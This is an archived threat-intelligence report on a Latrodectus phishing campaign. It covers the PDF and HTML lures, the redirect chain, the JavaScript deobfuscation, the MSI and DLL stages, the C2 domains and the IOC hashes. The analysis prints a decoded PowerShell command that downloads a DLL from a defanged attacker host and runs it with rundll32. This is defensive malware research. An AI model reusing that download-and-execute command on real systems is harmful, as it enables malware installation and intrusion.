{
	"id": "9ec0af3f-3570-40e4-9989-980b4c3b79ec",
	"created_at": "2026-04-06T00:10:10.84132Z",
	"updated_at": "2026-04-10T03:23:51.85617Z",
	"deleted_at": null,
	"sha1_hash": "ba1cb63d661f23808c46df7316baa400367b7782",
	"title": "Inside the Latrodectus Malware Campaign",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 850681,
	"plain_text": "Inside the Latrodectus Malware Campaign\r\nPublished: 2024-10-18 · Archived: 2026-04-05 13:36:09 UTC\r\nThis report offers an in-depth analysis of recent Latrodectus campaign activity uncovered by our X-Labs research\r\nteam.  One of the principal dissemination techniques for Latrodectus involves phishing emails, leveraging\r\ninfrastructure like that of IcedID. \r\nLatrodectus primarily targets financial, automotive and healthcare business sectors.  By compromising email\r\naccounts and distributing malicious attachments, it propagates across a broader network of potential targets. \r\nCurrently, threat actors are increasingly adopting Latrodectus, utilizing prevalent attachment formats such as\r\nHTML and PDF. It is typically engineered for stealth and persistence, complicating detection and eradication\r\nefforts. This can lead to the exfiltration of personal data, financial losses due to fraud or extortion, and the\r\ncompromise of sensitive information.\r\nThe Latrodectus campaign initiates with attacks originating from a compromised email that appears to contain\r\ncritical DocuSign documents. Users are encouraged to access the document via the provided link. When the link is\r\nclicked, users are redirected to a malicious URL, resulting in the inadvertent download of the next-stage payload.\r\nFig. 1 - Attack chain\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 1 of 8\n\nFig. 2 - Initial access PDF\r\nFig. 3 - PDF suspicious embedded URL\r\nPDF contains compromised domain with redirection:\r\n“hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW”\r\n It redirects to shortner URLs to another suspicious domain:\r\n “hxxps://digitalpinnaclepub[.]com/?3” and finally redirects to “storage.googleapis.com” project to download\r\nmalicious obfuscated JavaScricpt “hxxps://storage[.]googleapis[.]com/braided-turbine-435813-\r\nn7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js”\r\nObfuscated JavaScript Analysis:\r\nJavaScript contains a lot of junk messages in “//” which increases obfuscation and file size. Actual\r\nmalicious JavaScript code is commented in “////”\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 2 of 8\n\nFig. 4 - Obfuscated JavaScript payload\r\nAfter removing junk messages, it shows obfuscated JavaScript string manipulation replace and join\r\nfunctions. Replacing “////” with a space (“ “) shows actual malcode.\r\nFig. 5 - Deobfuscated Javascript string manipulation functions\r\nAfter deobfuscation, it creates ActiveXObject(\"WindowsInstaller.Installer\") and downloads a .msi installer\r\nfile. See Fig. 6 below:\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 3 of 8\n\nFig. 6  - Deobfuscated Javascript code downloads MSI file\r\nMSI Analysis:\r\nMSI file is executed via JavaScript and drops malicious 64-bit .dll file in %appdata%. It also executes .dll\r\nwith rundll32.exe using export function parameters.\r\nFig. 7 - MSI file\r\nDropped .dll contains export function “GetDeepDVCState” and MSIexecute this .dll with parameter\r\n“/DontWait C:/Windows/SysWOW64/rundll32.exe\r\nC:\\Users\\Admin\\AppData\\Roaming\\vierm_soft_x64.dll, GetDeepDVCState”\r\nDLL Analysis:\r\nDLL is a Microsoft Visual C++ 64-bit binary with fake NVIDIA version information:\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 4 of 8\n\nFig. 8  - DLL vesion info\r\nUpon analysis, this DLL unpacks another stage DLL payload in memory:\r\n Fig. 9 - DLL verion info.\r\nUnpacked 64-bit dll binary connects to malicious C2 server on unusual port 8041.\r\nGreshunka[.]com:8041/bazar.php\r\nInitial Access via HTML\r\nPhishing HTML page which looks like a Word document pop-up to the user. Clicking on the button executes\r\nmalicious JavaScript code embedded in HTML. See Fig. 10 below:\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 5 of 8\n\nFig. 10  - HTML attachment\r\nIt contains pop-up warning messages in reverse order:\r\n“document.getElementById(\"prompt\").innerHTML = ll('.nottub \u003eb/\u003c\"noituloS\"\u003eb\u003c eht gnisu woleb snoitcurtsni\r\neht wollof esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY');”\r\nReversed message: \r\nYour browser does not support correct offline display of this document. Please follow the\r\ninstructions below using the\r\nIt also uses different string encoding window.atob() and obfuscation functions s.split(\"\").reverse().join(\"\"); \r\nFig. 11 - Suspicious code in HTML\r\nDecoded base64 code\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 6 of 8\n\ncmd /c start /min powershell $path='%appdata%\\witwin_st_x64.dll';iwr hxxp://gertioma[.]top/o.jpg -outfile $path;\r\nstart-process rundll32 $path,NxReleasePMap8==\r\nIt shows threat actors try to use HTML to launch PowerShell and directly downloads the DLL payload without\r\nMSI and executes it with rundll32.exe and connects to C2. We have observed few campaigns with an HTML\r\nattachment in compromised emails.\r\nConclusion:\r\nThreat actors continue to use older emails to target users via suspicious PDF or HTML attachments. They use a\r\nredirection method with URL shorteners and host malicious payloads on well-known storage[.]googleapis[.]com\r\nhosting projects. Then downloads obfuscated JavaScript to download MSI and uses rundll32.exe to execute 64-bit\r\nDLL. \r\nThis campaign mixes the old with the new. Latrodectus leverages older infrastructure, combined with a new,\r\ninnovative malware payload distribution method to financial, automotive and business sectors.\r\nProtection statement: \r\nForcepoint customers are protected against this threat at the following stages of attack:\r\nStage 2 (Lure) – Malicious PDF and HTML attachments associated with these attacks are identified and\r\nblocked.\r\nStage 3 (Redirect) – Blocked redirectional shortened URLs and compromised domains\r\nStage 5 (Dropper File) - The dropper files are added to Forcepoint malicious database and are blocked.\r\nStage 6 (Call Home) - Blocked C2 credentials\r\nIOCs\r\nInitial Stage URLs: \r\nhxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW\r\nhxxps://cutt[.]ly/seU8MT6t#_fZ0NmW\r\nhxxps://digitalpinnaclepub[.]com/?3\r\nhxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-\r\n17-57.js\r\nhxxp://194[.]54[.]156[.]91/dsa.msi\r\nhxxp://gertioma[.]top/o.jpg\r\nC2s:\r\ntiguanin[.]com\r\ngreshunka[.]com\r\nbazarunet[.]com\r\nmazinom[.]com\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 7 of 8\n\nleroboy[.]com\r\nkrinzhodom[.]com\r\nklemanzino[.]net\r\nrilomenifis[.]com\r\nisomicrotich[.]com\r\nHashes:\r\n35A990C3BE798108C9D12A47F4A028468EA6095B\r\n9361621490915EBB919B79C6101874F03E4E51BC\r\n71E99A21FFA29E1E391811F5A3D04DCBB9CF0949\r\n570c4ab78cf4bb22b78aac215a4a79189d4fa9ed\r\n62e23500cc5368e37be47371342784f72e481647\r\n881993bcb37aa9504249271b7559addc0c633f09\r\n7474873629399ee5fdd984c99b705e0490ab8707\r\nSource: https://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nhttps://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign"
	],
	"report_names": [
		"inside-latrodectus-malware-phishing-campaign"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434210,
	"ts_updated_at": 1775791431,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ba1cb63d661f23808c46df7316baa400367b7782.pdf",
		"text": "https://archive.orkl.eu/ba1cb63d661f23808c46df7316baa400367b7782.txt",
		"img": "https://archive.orkl.eu/ba1cb63d661f23808c46df7316baa400367b7782.jpg"
	}
}